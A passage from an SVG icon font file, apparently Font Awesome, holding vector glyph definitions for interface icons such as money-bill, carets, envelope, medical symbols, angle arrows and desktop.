c12.7002 0 24.9004 -5.09961 33.9004 -14.0996l99.9004 -99.9004c9 -9 14.0996 -21.2002 14.0996 -33.9004v-108.1h16zM160 -16c26.5 0 48 21.5 48 48s-21.5 48 -48 48s-48 -21.5 -48 -48s21.5 -48 48 -48zM480 -16c26.5 0 48 21.5 48 48s-21.5 48 -48 48s-48 -21.5 -48 -48
s21.5 -48 48 -48zM560 192v12.0996l-99.9004 99.9004h-44.0996v-112h144z" />
    <glyph glyph-name="money-bill" unicode="&#xf0d6;" horiz-adv-x="640" 
d="M608 384c17.6699 0 32 -14.3301 32 -32v-320c0 -17.6699 -14.3301 -32 -32 -32h-576c-17.6699 0 -32 14.3301 -32 32v320c0 17.6699 14.3301 32 32 32h576zM48 48h64c0 35.3496 -28.6504 64 -64 64v-64zM48 272c35.3496 0 64 28.6504 64 64h-64v-64zM320 96
c44.1699 0 80 42.9697 80 96c0 53.0195 -35.8203 96 -80 96s-80 -42.9805 -80 -96c0 -53.0098 35.8096 -96 80 -96zM592 48v64c-35.3496 0 -64 -28.6504 -64 -64h64zM592 272v64h-64c0 -35.3496 28.6504 -64 64 -64z" />
    <glyph glyph-name="caret-down" unicode="&#xf0d7;" horiz-adv-x="319" 
d="M31.2998 256h257.3c17.8008 0 26.7002 -21.5 14.1006 -34.0996l-128.601 -128.7c-7.7998 -7.7998 -20.5 -7.7998 -28.2998 0l-128.6 128.7c-12.6006 12.5996 -3.7002 34.0996 14.0996 34.0996z" />
    <glyph glyph-name="caret-up" unicode="&#xf0d8;" horiz-adv-x="320" 
d="M288.662 96h-257.324c-17.8184 0 -26.7412 21.543 -14.1416 34.1416l128.662 128.662c7.80957 7.81055 20.4736 7.81055 28.2832 0l128.662 -128.662c12.6006 -12.5986 3.67676 -34.1416 -14.1416 -34.1416z" />
    <glyph glyph-name="caret-left" unicode="&#xf0d9;" horiz-adv-x="215" 
d="M192 320.662v-257.324c0 -17.8184 -21.543 -26.7412 -34.1416 -14.1416l-128.662 128.662c-7.81055 7.80957 -7.81055 20.4736 0 28.2832l128.662 128.662c12.5986 12.6006 34.1416 3.67676 34.1416 -14.1416z" />
    <glyph glyph-name="caret-right" unicode="&#xf0da;" horiz-adv-x="168" 
d="M0 63.3379v257.324c0 17.8184 21.543 26.7412 34.1416 14.1416l128.662 -128.662c7.81055 -7.80957 7.81055 -20.4736 0 -28.2832l-128.662 -128.662c-12.5986 -12.6006 -34.1416 -3.67676 -34.1416 14.1416z" />
    <glyph glyph-name="columns" unicode="&#xf0db;" 
d="M464 416c26.5098 0 48 -21.4902 48 -48v-352c0 -26.5098 -21.4902 -48 -48 -48h-416c-26.5098 0 -48 21.4902 -48 48v352c0 26.5098 21.4902 48 48 48h416zM224 32v256h-160v-256h160zM448 32v256h-160v-256h160z" />
    <glyph glyph-name="sort" unicode="&#xf0dc;" horiz-adv-x="320" 
d="M41 160h238c21.4004 0 32.0996 -25.9004 17 -41l-119 -119c-9.40039 -9.40039 -24.5996 -9.40039 -33.9004 0l-119.1 119c-15.0996 15.0996 -4.40039 41 17 41zM296 265c15.0996 -15.0996 4.40039 -41 -17 -41h-238c-21.4004 0 -32.0996 25.9004 -17 41l119.1 119
c9.30078 9.40039 24.5 9.40039 33.9004 0z" />
    <glyph glyph-name="sort-down" unicode="&#xf0dd;" horiz-adv-x="320" 
d="M41 160h238c21.4004 0 32.0996 -25.9004 17 -41l-119 -119c-9.40039 -9.40039 -24.5996 -9.40039 -33.9004 0l-119.1 119c-15.0996 15.0996 -4.40039 41 17 41z" />
    <glyph glyph-name="sort-up" unicode="&#xf0de;" horiz-adv-x="319" 
d="M279 224h-238c-21.4004 0 -32.0996 25.9004 -17 41l119 119c9.40039 9.40039 24.5996 9.40039 33.9004 0l119 -119c15.1992 -15.0996 4.5 -41 -16.9004 -41z" />
    <glyph glyph-name="envelope" unicode="&#xf0e0;" 
d="M502.3 257.2c3.90039 3.09961 9.7002 0.200195 9.7002 -4.7002v-204.5c0 -26.5 -21.5 -48 -48 -48h-416c-26.5 0 -48 21.5 -48 48v204.4c0 5 5.7002 7.7998 9.7002 4.69922c22.3994 -17.3994 52.0996 -39.5 154.1 -113.6
c21.1006 -15.4004 56.7002 -47.7998 92.2002 -47.5996c35.7002 -0.300781 72 32.7998 92.2998 47.5996c102 74.0996 131.601 96.2998 154 113.7zM256 128c-23.2002 -0.400391 -56.5996 29.2002 -73.4004 41.4004c-132.699 96.2998 -142.8 104.8 -173.399 128.699
c-5.7998 4.60059 -9.2002 11.5 -9.2002 18.9004v19c0 26.5 21.5 48 48 48h416c26.5 0 48 -21.5 48 -48v-19c0 -7.40039 -3.40039 -14.4004 -9.2002 -18.9004c-30.5996 -24 -40.7002 -32.3994 -173.399 -128.699c-16.8008 -12.2002 -50.2002 -41.8008 -73.4004 -41.4004z" />
    <glyph glyph-name="undo" unicode="&#xf0e2;" horiz-adv-x="504" 
d="M212.333 223.667h-200.333c-6.62695 0 -12 5.37305 -12 12v200.333c0 6.62695 5.37305 12 12 12h48c6.62695 0 12 -5.37305 12 -12v-78.1123c45.7734 50.833 112.26 82.6426 186.175 82.1055c136.906 -0.994141 246.448 -111.623 246.157 -248.532
c-0.291016 -136.719 -111.212 -247.461 -247.999 -247.461c-64.0889 0 -122.496 24.3135 -166.51 64.2148c-5.09961 4.62207 -5.33398 12.5537 -0.466797 17.4199l33.9668 33.9668c4.47363 4.47461 11.6621 4.71777 16.4004 0.525391
c31.0361 -27.4629 71.8564 -44.127 116.609 -44.127c97.2676 0 176 78.7158 176 176c0 97.2666 -78.7158 176 -176 176c-58.4961 0 -110.28 -28.4756 -142.274 -72.333h98.2744c6.62695 0 12 -5.37305 12 -12v-48c0 -6.62695 -5.37305 -12 -12 -12z" />
    <glyph glyph-name="gavel" unicode="&#xf0e3;" 
d="M504.971 248.638c9.37207 -9.37305 9.37207 -24.5684 0 -33.9404l-124.451 -124.451c-9.37109 -9.37305 -24.5674 -9.37305 -33.9404 0l-22.627 22.627c-9.37305 9.37207 -9.37305 24.5684 0 33.9414l5.65723 5.65625l-39.5986 39.5986l-81.04 -81.04l5.65723 -5.65723
c12.4971 -12.4971 12.4971 -32.7578 0 -45.2549l-114.745 -114.745c-12.4971 -12.4971 -32.7578 -12.4971 -45.2549 0l-45.2549 45.2549c-12.4971 12.4971 -12.4971 32.7578 0 45.2549l114.744 114.746c12.4971 12.4971 32.7578 12.4971 45.2549 0l5.65723 -5.65723
l81.04 81.04l-39.5986 39.5986l-5.65625 -5.65723c-9.37207 -9.37305 -24.5684 -9.37305 -33.9414 0l-22.627 22.627c-9.37305 9.37207 -9.37305 24.5684 0 33.9404l124.451 124.451c9.37207 9.37305 24.5674 9.37305 33.9404 0l22.627 -22.6279
c9.37305 -9.37207 9.37305 -24.5674 0 -33.9404l-5.65625 -5.65723l113.138 -113.137l5.65723 5.65625c9.37207 9.37305 24.5674 9.37305 33.9404 0z" />
    <glyph glyph-name="bolt" unicode="&#xf0e7;" horiz-adv-x="320" 
d="M296 288c18.5 0 30 -20.0996 20.7002 -36l-176 -304c-4.40039 -7.59961 -12.4004 -12 -20.7998 -12c-15.3008 0 -26.9004 14.2998 -23.3008 29.5l46.1006 194.5h-118.7c-14.5 0 -25.7002 12.7998 -23.7998 27.2002l32 240
c1.59961 11.8994 11.7998 20.7998 23.7998 20.7998h144c15.7002 0 27.2002 -15 23.2002 -30.2002l-42.6006 -129.8h115.4z" />
    <glyph glyph-name="sitemap" unicode="&#xf0e8;" horiz-adv-x="640" 
d="M128 96c17.6699 0 32 -14.3301 32 -32v-96c0 -17.6699 -14.3301 -32 -32 -32h-96c-17.6699 0 -32 14.3301 -32 32v96c0 17.6699 14.3301 32 32 32h96zM104 176v-48h-48v57.5898c0 21.1797 17.2305 38.4102 38.4102 38.4102h201.59v64h-40c-17.6699 0 -32 14.3301 -32 32
v96c0 17.6699 14.3301 32 32 32h128c17.6699 0 32 -14.3301 32 -32v-96c0 -17.6699 -14.3301 -32 -32 -32h-40v-64h201.59c21.1797 0 38.4102 -17.2402 38.4102 -38.4102v-57.5898h-48v48h-192v-48h-48v48h-192zM368 96c17.6699 0 32 -14.3301 32 -32v-96
c0 -17.6699 -14.3301 -32 -32 -32h-96c-17.6699 0 -32 14.3301 -32 32v96c0 17.6699 14.3301 32 32 32h96zM608 96c17.6699 0 32 -14.3301 32 -32v-96c0 -17.6699 -14.3301 -32 -32 -32h-96c-17.6699 0 -32 14.3301 -32 32v96c0 17.6699 14.3301 32 32 32h96z" />
    <glyph glyph-name="umbrella" unicode="&#xf0e9;" horiz-adv-x="576" 
d="M575.7 167.2c2.2002 -10.1006 -8.40039 -21.4004 -18.7002 -11.4004c-51.5 54.4004 -107.6 52.5 -158.6 -37c-5.30078 -9.5 -14.9004 -8.59961 -19.7002 0c-2.5 4.40039 -32.2002 73.2002 -90.7002 73.2002c-45.7998 0 -70.5 -37.7998 -90.7002 -73.2002
c-4.7998 -8.59961 -14.3994 -9.5 -19.7002 0c-50.8994 89.4004 -106.6 92 -158.6 37c-10.2002 -9.89941 -20.9004 1.2998 -18.7002 11.4004c29.2002 136.3 138 218.2 255.7 230.899v17.9004c0 17.7002 14.2998 32 32 32s32 -14.2998 32 -32v-17.9004
c117.3 -12.6992 227.1 -94.5996 255.7 -230.899zM256 146.3c9.59961 8.90039 19.7002 13.6006 32 13.7002c12.2002 0 22.9004 -5.7002 32 -13.5996v-130.301c0 -44.0996 -35.9004 -80 -80 -80c-33.7998 0 -64.2002 21.4004 -75.4004 53.3008
c-5.89941 16.5996 2.80078 34.8994 19.5 40.7998c16.7002 5.89941 34.9004 -2.7998 40.8008 -19.5c1.89941 -5.40039 7.2998 -10.7002 15.0996 -10.7002c8.7998 0 16 7.2002 16 16v130.3z" />
    <glyph glyph-name="paste" unicode="&#xf0ea;" horiz-adv-x="448" 
d="M128 264v-232h-104c-13.2549 0 -24 10.7451 -24 24v336c0 13.2549 10.7451 24 24 24h80.6104c11.084 19.1104 31.7529 32 55.3896 32s44.3057 -12.8896 55.3896 -32h80.6104c13.2549 0 24 -10.7451 24 -24v-72h-136c-30.8779 0 -56 -25.1211 -56 -56zM160 408
c-13.2549 0 -24 -10.7451 -24 -24s10.7451 -24 24 -24s24 10.7451 24 24s-10.7451 24 -24 24zM344 160h104v-200c0 -13.2549 -10.7451 -24 -24 -24h-240c-13.2549 0 -24 10.7451 -24 24v304c0 13.2549 10.7451 24 24 24h136v-104c0 -13.2002 10.7998 -24 24 -24z
M448 198.059v-6.05859h-96v96h6.05859c5.4873 0 13.0898 -3.14941 16.9707 -7.0293l65.9404 -65.9404c3.88086 -3.88086 7.03027 -11.4834 7.03027 -16.9717z" />
    <glyph glyph-name="lightbulb" unicode="&#xf0eb;" horiz-adv-x="352" 
d="M96.0596 -6.34961l-0.0498047 38.3496h159.98l-0.0400391 -38.3496c-0.00585938 -5.3291 -2.40723 -13.2549 -5.36035 -17.6904l-17.0898 -25.6904c-5.24023 -7.88184 -17.1748 -14.2793 -26.6396 -14.2793h-61.71c-9.46582 0 -21.4004 6.39746 -26.6406 14.2793
l-17.0898 25.6904c-3.49023 5.24023 -5.34961 11.4004 -5.36035 17.6904zM0 272c0 93.0303 73.4404 175.69 175.45 176c97.46 0.299805 176.55 -78.6104 176.55 -176c0 -44.3701 -16.4502 -84.8496 -43.5596 -115.78c-16.5205 -18.8496 -42.3604 -58.2295 -52.21 -91.4502
c-0.0400391 -0.269531 -0.0703125 -0.519531 -0.110352 -0.779297h-160.24c-0.0400391 0.259766 -0.0703125 0.519531 -0.110352 0.779297c-9.84961 33.2207 -35.6895 72.6006 -52.21 91.4502c-27.1094 30.9307 -43.5596 71.4102 -43.5596 115.78zM176 352
c8.83984 0 16 7.16016 16 16s-7.16016 16 -16 16c-61.7598 0 -112 -50.2402 -112 -112c0 -8.83984 7.16016 -16 16 -16s16 7.16016 16 16c0 44.1104 35.8896 80 80 80z" />
    <glyph glyph-name="user-md" unicode="&#xf0f0;" horiz-adv-x="448" 
d="M224 192c-70.7002 0 -128 57.2998 -128 128s57.2998 128 128 128s128 -57.2998 128 -128s-57.2998 -128 -128 -128zM104 24c0 13.2998 10.7002 24 24 24s24 -10.7002 24 -24s-10.7002 -24 -24 -24s-24 10.7002 -24 24zM320 159.4c71.2002 -3.5 128 -61.8008 128 -133.801
v-44.7998c0 -24.7002 -20.0996 -44.7998 -44.7998 -44.7998h-358.4c-24.7002 0 -44.7998 20.0996 -44.7998 44.7998v44.7998c0 66.6006 48.5 121.4 112.1 132.101v-80.4004c-23.0996 -6.89941 -40 -28.0996 -40 -53.3994c0 -30.9004 25.1006 -56 56 -56
c30.9004 0 56 25.0996 56 56c0 25.2998 -16.8994 46.5 -40 53.3994v81.6006c7.7002 -1 15.2002 -2.60059 22.6006 -5.2002c18 -6.2998 37.2998 -9.7998 57.3994 -9.7998c20.1006 0 39.4004 3.5 57.4004 9.7998c2.2002 0.799805 4.40039 1.2002 6.59961 1.89941v-45.1992
c-36.5 -7.5 -64 -39.8008 -64 -78.4004v-43.7998c0 -8.10059 5.90039 -14.7998 13.8008 -15.9004l31.1992 -4.2002c4.30078 -0.799805 8.5 2 9.40039 6.30078l3.09961 15.6992c0.800781 4.30078 -2 8.5 -6.2998 9.40039l-19.2998 3.90039v26.6992
c0 67 96 64.7002 96 1.90039v-28.5l-19.2998 -3.90039c-4.40039 -0.799805 -7.2002 -5.09961 -6.2998 -9.39941l3.09961 -15.7002c0.900391 -4.40039 5.09961 -7.2002 9.40039 -6.2998l32.1992 6.39941c7.5 1.5 12.9004 8.10059 12.9004 15.7002v41.7002
c0 38.5996 -27.5 71 -64 78.4004v49z" />
    <glyph glyph-name="stethoscope" unicode="&#xf0f1;" 
d="M447.1 336c35.7002 0.5 64.9004 -28.2998 64.9004 -64c0 -23.7002 -12.9004 -44.2998 -32 -55.4004v-112.6c0 -92.5996 -79 -168 -176 -168c-95.4004 0 -173.3 72.7998 -175.9 163.2c-73 14.7998 -128.1 79.5 -128.1 156.8v155.4c0 11.5 8.09961 21.2998 19.2998 23.5996
l62.7998 12.4004c13 2.59961 25.6006 -5.80078 28.2002 -18.8008l3.10059 -15.6992c2.59961 -13 -5.80078 -25.6006 -18.8008 -28.2002l-30.6992 -6.10059v-122.5c0 -53.2998 43.5 -96.5 96.8994 -96c52.9004 0.5 95.1006 44.3008 95.1006 97.2002v121.4l-30.7002 6.09961
c-13 2.60059 -21.4004 15.2002 -18.7998 28.2002l3.19922 15.7002c2.60059 13 15.2002 21.3994 28.2002 18.7998l62.9004 -12.5996c11.2002 -2.2002 19.2998 -12.1006 19.2998 -23.5v-155.4c0 -77.2002 -55 -141.8 -127.8 -156.8
c2.7002 -55.1006 51.8994 -99.2002 111.899 -99.2002c61.8008 0 112 46.7002 112 104v112.6c-19.5 11.2002 -32.5 32.5 -32 56.8008c0.700195 34.1992 28.8008 62.0996 63 62.5996zM448 256c8.7998 0 16 7.2002 16 16s-7.2002 16 -16 16s-16 -7.2002 -16 -16
s7.2002 -16 16 -16z" />
    <glyph glyph-name="suitcase" unicode="&#xf0f2;" 
d="M128 -32v400c0 26.5 21.5 48 48 48h160c26.5 0 48 -21.5 48 -48v-400h-256zM192 352v-32h128v32h-128zM512 272v-256c0 -26.5 -21.5 -48 -48 -48h-48v352h48c26.5 0 48 -21.5 48 -48zM96 -32h-48c-26.5 0 -48 21.5 -48 48v256c0 26.5 21.5 48 48 48h48v-352z" />
    <glyph glyph-name="bell" unicode="&#xf0f3;" horiz-adv-x="448" 
d="M224 -64c-35.3203 0 -63.9697 28.6504 -63.9697 64h127.939c0 -35.3496 -28.6494 -64 -63.9697 -64zM439.39 85.71c6 -6.44043 8.66016 -14.1602 8.61035 -21.71c-0.0996094 -16.4004 -12.9805 -32 -32.0996 -32h-383.801c-19.1191 0 -31.9893 15.5996 -32.0996 32
c-0.0498047 7.5498 2.61035 15.2598 8.61035 21.71c19.3193 20.7598 55.4697 51.9902 55.4697 154.29c0 77.7002 54.4795 139.9 127.939 155.16v20.8398c0 17.6699 14.3203 32 31.9805 32s31.9805 -14.3301 31.9805 -32v-20.8398
c73.46 -15.2598 127.939 -77.46 127.939 -155.16c0 -102.3 36.1504 -133.53 55.4697 -154.29z" />
    <glyph glyph-name="coffee" unicode="&#xf0f4;" horiz-adv-x="640" 
d="M192 64c-53 0 -96 43 -96 96v232c0 13.2998 10.7002 24 24 24h392c70.5996 0 128 -57.4004 128 -128s-57.4004 -128 -128 -128h-32c0 -53 -43 -96 -96 -96h-192zM512 352h-32v-128h32c35.2998 0 64 28.7002 64 64s-28.7002 64 -64 64zM559.7 -32h-511.4
c-47.5996 0 -61 64 -36 64h583.3c25 0 11.8008 -64 -35.8994 -64z" />
    <glyph glyph-name="hospital" unicode="&#xf0f8;" horiz-adv-x="448" 
d="M448 -44v-20h-448v20c0 6.62695 5.37305 12 12 12h20v360c0 13.2549 10.7451 24 24 24h88v72c0 13.2549 10.7451 24 24 24h112c13.2549 0 24 -10.7451 24 -24v-72h88c13.2549 0 24 -10.7451 24 -24v-360h20c6.62695 0 12 -5.37305 12 -12zM308 256h-40
c-6.62695 0 -12 -5.37305 -12 -12v-40c0 -6.62695 5.37305 -12 12 -12h40c6.62695 0 12 5.37305 12 12v40c0 6.62695 -5.37305 12 -12 12zM140 192h40c6.62695 0 12 5.37305 12 12v40c0 6.62695 -5.37305 12 -12 12h-40c-6.62695 0 -12 -5.37305 -12 -12v-40
c0 -6.62695 5.37305 -12 12 -12zM244 64h-40c-6.62695 0 -12 -5.37305 -12 -12v-84h64v84c0 6.62695 -5.37305 12 -12 12zM308 160h-40c-6.62695 0 -12 -5.37305 -12 -12v-40c0 -6.62695 5.37305 -12 12 -12h40c6.62695 0 12 5.37305 12 12v40c0 6.62695 -5.37305 12 -12 12
zM192 148c0 6.62695 -5.37305 12 -12 12h-40c-6.62695 0 -12 -5.37305 -12 -12v-40c0 -6.62695 5.37305 -12 12 -12h40c6.62695 0 12 5.37305 12 12v40zM182 352h26v-26c0 -3.31152 2.68848 -6 6 -6h20c3.31152 0 6 2.68848 6 6v26h26c3.31152 0 6 2.68848 6 6v20
c0 3.31152 -2.68848 6 -6 6h-26v26c0 3.31152 -2.68848 6 -6 6h-20c-3.31152 0 -6 -2.68848 -6 -6v-26h-26c-3.31152 0 -6 -2.68848 -6 -6v-20c0 -3.31152 2.68848 -6 6 -6z" />
    <glyph glyph-name="ambulance" unicode="&#xf0f9;" horiz-adv-x="640" 
d="M624 96c8.7998 0 16 -7.2002 16 -16v-32c0 -8.7998 -7.2002 -16 -16 -16h-48c0 -53 -43 -96 -96 -96s-96 43 -96 96h-128c0 -53 -43 -96 -96 -96s-96 43 -96 96h-16c-26.5 0 -48 21.5 -48 48v320c0 26.5 21.5 48 48 48h320c26.5 0 48 -21.5 48 -48v-48h44.0996
c12.7002 0 24.9004 -5.09961 33.9004 -14.0996l99.9004 -99.9004c9 -9 14.0996 -21.2002 14.0996 -33.9004v-108.1h16zM160 -16c26.5 0 48 21.5 48 48s-21.5 48 -48 48s-48 -21.5 -48 -48s21.5 -48 48 -48zM304 232v48c0 4.40039 -3.59961 8 -8 8h-56v56
c0 4.40039 -3.59961 8 -8 8h-48c-4.40039 0 -8 -3.59961 -8 -8v-56h-56c-4.40039 0 -8 -3.59961 -8 -8v-48c0 -4.40039 3.59961 -8 8 -8h56v-56c0 -4.40039 3.59961 -8 8 -8h48c4.40039 0 8 3.59961 8 8v56h56c4.40039 0 8 3.59961 8 8zM480 -16c26.5 0 48 21.5 48 48
s-21.5 48 -48 48s-48 -21.5 -48 -48s21.5 -48 48 -48zM560 192v12.0996l-99.9004 99.9004h-44.0996v-112h144z" />
    <glyph glyph-name="medkit" unicode="&#xf0fa;" 
d="M96 -32v352h32v48c0 26.5098 21.4902 48 48 48h160c26.5098 0 48 -21.4902 48 -48v-48h32v-352h-320zM192 352v-32h128v32h-128zM512 272v-256c0 -26.5098 -21.4902 -48 -48 -48h-16v352h16c26.5098 0 48 -21.4902 48 -48zM64 -32h-16c-26.5098 0 -48 21.4902 -48 48v256
c0 26.5098 21.4902 48 48 48h16v-352zM352 176c0 8.83691 -7.16309 16 -16 16h-48v48c0 8.83691 -7.16309 16 -16 16h-32c-8.83691 0 -16 -7.16309 -16 -16v-48h-48c-8.83691 0 -16 -7.16309 -16 -16v-32c0 -8.83691 7.16309 -16 16 -16h48v-48
c0 -8.83691 7.16309 -16 16 -16h32c8.83691 0 16 7.16309 16 16v48h48c8.83691 0 16 7.16309 16 16v32z" />
    <glyph glyph-name="fighter-jet" unicode="&#xf0fb;" horiz-adv-x="640" 
d="M544 224c96 -21.333 96 -26.583 96 -32s0 -10.667 -96 -32l-128 -16l-48 -16h-24l-116.842 -148h39.5088c11.666 0 21.333 -2.625 21.333 -6s-9.66602 -6 -21.333 -6h-114.667v12h16v164h-48l-66.666 -80h-34.667l-10.667 10.667v69.333h8v16h48v2.66699l-64 8v42.667
l64 8v2.66602h-48v16h-8v69.333l10.667 10.667h34.666l66.667 -80h48v164h-16v12h114.667c11.666 0 21.333 -2.625 21.333 -6s-9.66699 -6 -21.333 -6h-39.5088l116.842 -148h24l48 -16z" />
    <glyph glyph-name="beer" unicode="&#xf0fc;" horiz-adv-x="448" 
d="M368 352c44.1123 0 80 -35.8877 80 -80v-128.86c0 -31.5273 -18.6035 -60.2031 -47.3936 -73.0527l-80.6064 -35.9766v-42.1104c0 -13.2549 -10.7451 -24 -24 -24h-272c-13.2549 0 -24 10.7451 -24 24v400c0 13.2549 10.7451 24 24 24h272c13.2549 0 24 -10.7451 24 -24
v-40h48zM384 143.14v128.86c0 8.82227 -7.17773 16 -16 16h-48v-183.805l54.5215 24.334c5.22754 2.33789 9.47461 8.88379 9.47852 14.6104zM208 64c8.83594 0 16 7.16406 16 16v224c0 8.83594 -7.16406 16 -16 16s-16 -7.16406 -16 -16v-224
c0 -8.83594 7.16406 -16 16 -16zM112 64c8.83594 0 16 7.16406 16 16v224c0 8.83594 -7.16406 16 -16 16s-16 -7.16406 -16 -16v-224c0 -8.83594 7.16406 -16 16 -16z" />
    <glyph glyph-name="h-square" unicode="&#xf0fd;" horiz-adv-x="448" 
d="M448 368v-352c0 -26.5098 -21.4902 -48 -48 -48h-352c-26.5098 0 -48 21.4902 -48 48v352c0 26.5098 21.4902 48 48 48h352c26.5098 0 48 -21.4902 48 -48zM336 320h-32c-8.83691 0 -16 -7.16309 -16 -16v-80h-128v80c0 8.83691 -7.16309 16 -16 16h-32
c-8.83691 0 -16 -7.16309 -16 -16v-224c0 -8.83691 7.16309 -16 16 -16h32c8.83691 0 16 7.16309 16 16v80h128v-80c0 -8.83691 7.16309 -16 16 -16h32c8.83691 0 16 7.16309 16 16v224c0 8.83691 -7.16309 16 -16 16z" />
    <glyph glyph-name="plus-square" unicode="&#xf0fe;" horiz-adv-x="448" 
d="M400 416c26.5 0 48 -21.5 48 -48v-352c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h352zM368 164v56c0 6.59961 -5.40039 12 -12 12h-92v92c0 6.59961 -5.40039 12 -12 12h-56c-6.59961 0 -12 -5.40039 -12 -12v-92h-92
c-6.59961 0 -12 -5.40039 -12 -12v-56c0 -6.59961 5.40039 -12 12 -12h92v-92c0 -6.59961 5.40039 -12 12 -12h56c6.59961 0 12 5.40039 12 12v92h92c6.59961 0 12 5.40039 12 12z" />
    <glyph glyph-name="angle-double-left" unicode="&#xf100;" horiz-adv-x="448" 
d="M223.7 209l136 136c9.39941 9.40039 24.5996 9.40039 33.8994 0l22.6006 -22.5996c9.39941 -9.40039 9.39941 -24.6006 0 -33.9004l-96.2998 -96.5l96.3994 -96.4004c9.40039 -9.39941 9.40039 -24.5996 0 -33.8994l-22.5996 -22.7002
c-9.40039 -9.40039 -24.6006 -9.40039 -33.9004 0l-136 136c-9.5 9.40039 -9.5 24.5996 -0.0996094 34zM31.7002 175c-9.40039 9.40039 -9.40039 24.5996 0.0996094 34l136 136c9.2998 9.40039 24.5 9.40039 33.9004 0l22.5996 -22.7002
c9.40039 -9.2998 9.40039 -24.5 0 -33.8994l-96.3994 -96.4004l96.2998 -96.5c9.39941 -9.2998 9.39941 -24.5 0 -33.9004l-22.6006 -22.5996c-9.2998 -9.40039 -24.5 -9.40039 -33.8994 0z" />
    <glyph glyph-name="angle-double-right" unicode="&#xf101;" horiz-adv-x="448" 
d="M224.3 175l-136 -136c-9.39941 -9.40039 -24.5996 -9.40039 -33.8994 0l-22.6006 22.5996c-9.39941 9.40039 -9.39941 24.6006 0 33.9004l96.4004 96.4004l-96.4004 96.3994c-9.39941 9.40039 -9.39941 24.6006 0 33.9004l22.5 22.7998
c9.40039 9.40039 24.6006 9.40039 33.9004 0l136 -136c9.5 -9.40039 9.5 -24.5996 0.0996094 -34zM416.3 209c9.40039 -9.40039 9.40039 -24.5996 0 -33.7998l-136 -136c-9.2998 -9.40039 -24.5 -9.40039 -33.8994 0l-22.6006 22.5996
c-9.39941 9.2998 -9.39941 24.5 0 33.9004l96.4004 96.3994l-96.4004 96.4004c-9.39941 9.2998 -9.39941 24.5 0 33.9004l22.6006 22.5996c9.2998 9.40039 24.5 9.40039 33.8994 0z" />
    <glyph glyph-name="angle-double-up" unicode="&#xf102;" horiz-adv-x="320" 
d="M177 192.3l136 -136c9.40039 -9.39941 9.40039 -24.5996 0 -33.8994l-22.5996 -22.6006c-9.40039 -9.39941 -24.6006 -9.39941 -33.9004 0l-96.5 96.2998l-96.4004 -96.3994c-9.39941 -9.40039 -24.5996 -9.40039 -33.8994 0l-22.7002 22.5996
c-9.40039 9.40039 -9.40039 24.6006 0 33.9004l136 136c9.40039 9.5 24.5996 9.5 34 0.0996094zM143 384.3c9.40039 9.40039 24.5996 9.40039 33.7998 0l136 -136c9.40039 -9.2998 9.40039 -24.5 0 -33.8994l-22.5996 -22.6006c-9.2998 -9.39941 -24.5 -9.39941 -33.9004 0
l-96.3994 96.4004l-96.4004 -96.4004c-9.2998 -9.39941 -24.5 -9.39941 -33.9004 0l-22.5996 22.6006c-9.40039 9.2998 -9.40039 24.5 0 33.8994z" />
    <glyph glyph-name="angle-double-down" unicode="&#xf103;" horiz-adv-x="320" 
d="M143 191.7l-136 136c-9.40039 9.39941 -9.40039 24.5996 0 33.8994l22.5996 22.6006c9.40039 9.39941 24.6006 9.39941 33.9004 0l96.4004 -96.4004l96.3994 96.4004c9.40039 9.39941 24.6006 9.39941 33.9004 0l22.7998 -22.5
c9.40039 -9.40039 9.40039 -24.6006 0 -33.9004l-136 -136c-9.40039 -9.5 -24.5996 -9.5 -34 -0.0996094zM177 -0.299805c-9.40039 -9.40039 -24.5996 -9.40039 -34 0.0996094l-136 136c-9.40039 9.2998 -9.40039 24.5 0 33.9004l22.7002 22.5996
c9.2998 9.40039 24.5 9.40039 33.8994 0l96.4004 -96.3994l96.5 96.2998c9.2998 9.39941 24.5 9.39941 33.9004 0l22.5996 -22.6006c9.40039 -9.2998 9.40039 -24.5 0 -33.8994z" />
    <glyph glyph-name="angle-left" unicode="&#xf104;" horiz-adv-x="256" 
d="M31.7002 209l136 136c9.39941 9.40039 24.5996 9.40039 33.8994 0l22.6006 -22.5996c9.39941 -9.40039 9.39941 -24.6006 0 -33.9004l-96.2998 -96.5l96.3994 -96.4004c9.40039 -9.39941 9.40039 -24.5996 0 -33.8994l-22.5996 -22.7002
c-9.40039 -9.40039 -24.6006 -9.40039 -33.9004 0l-136 136c-9.5 9.40039 -9.5 24.5996 -0.0996094 34z" />
    <glyph glyph-name="angle-right" unicode="&#xf105;" horiz-adv-x="256" 
d="M224.3 175l-136 -136c-9.39941 -9.40039 -24.5996 -9.40039 -33.8994 0l-22.6006 22.5996c-9.39941 9.40039 -9.39941 24.6006 0 33.9004l96.4004 96.4004l-96.4004 96.3994c-9.39941 9.40039 -9.39941 24.6006 0 33.9004l22.5 22.7998
c9.40039 9.40039 24.6006 9.40039 33.9004 0l136 -136c9.5 -9.40039 9.5 -24.5996 0.0996094 -34z" />
    <glyph glyph-name="angle-up" unicode="&#xf106;" horiz-adv-x="320" 
d="M177 288.3l136 -136c9.40039 -9.39941 9.40039 -24.5996 0 -33.8994l-22.5996 -22.6006c-9.40039 -9.39941 -24.6006 -9.39941 -33.9004 0l-96.5 96.2998l-96.4004 -96.3994c-9.39941 -9.40039 -24.5996 -9.40039 -33.8994 0l-22.7002 22.5996
c-9.40039 9.40039 -9.40039 24.6006 0 33.9004l136 136c9.40039 9.5 24.5996 9.5 34 0.0996094z" />
    <glyph glyph-name="angle-down" unicode="&#xf107;" horiz-adv-x="319" 
d="M143 95.7002l-136 136c-9.40039 9.39941 -9.40039 24.5996 0 33.8994l22.5996 22.6006c9.40039 9.39941 24.6006 9.39941 33.9004 0l96.4004 -96.4004l96.3994 96.4004c9.40039 9.39941 24.6006 9.39941 33.9004 0l22.5996 -22.6006
c9.40039 -9.39941 9.40039 -24.5996 0 -33.8994l-136 -136c-9.2002 -9.40039 -24.3994 -9.40039 -33.7998 0z" />
    <glyph glyph-name="desktop" unicode="&#xf108;" horiz-adv-x="576" 
d="M528 448c26.5 0 48 -21.5 48 -48v-320c0 -26.5 -21.5 -48 -48 -48h-192l16 -48h72c13.2998 0 24 -10.7002 24 -24s-10.7002 -24 -24 -24h-272c-13.2998 0 -24 10.7002 -24 24s10.7002 24 24 24h72l16 48h-192c-26.5 0 -48 21.5 -48 48v320c0 26.5 21.5 48 48 48h480z
M512 96v288h-448v-288h448z" />
    <glyph glyph-name="laptop" unicode="&#xf109;" horiz-adv-x="640" 
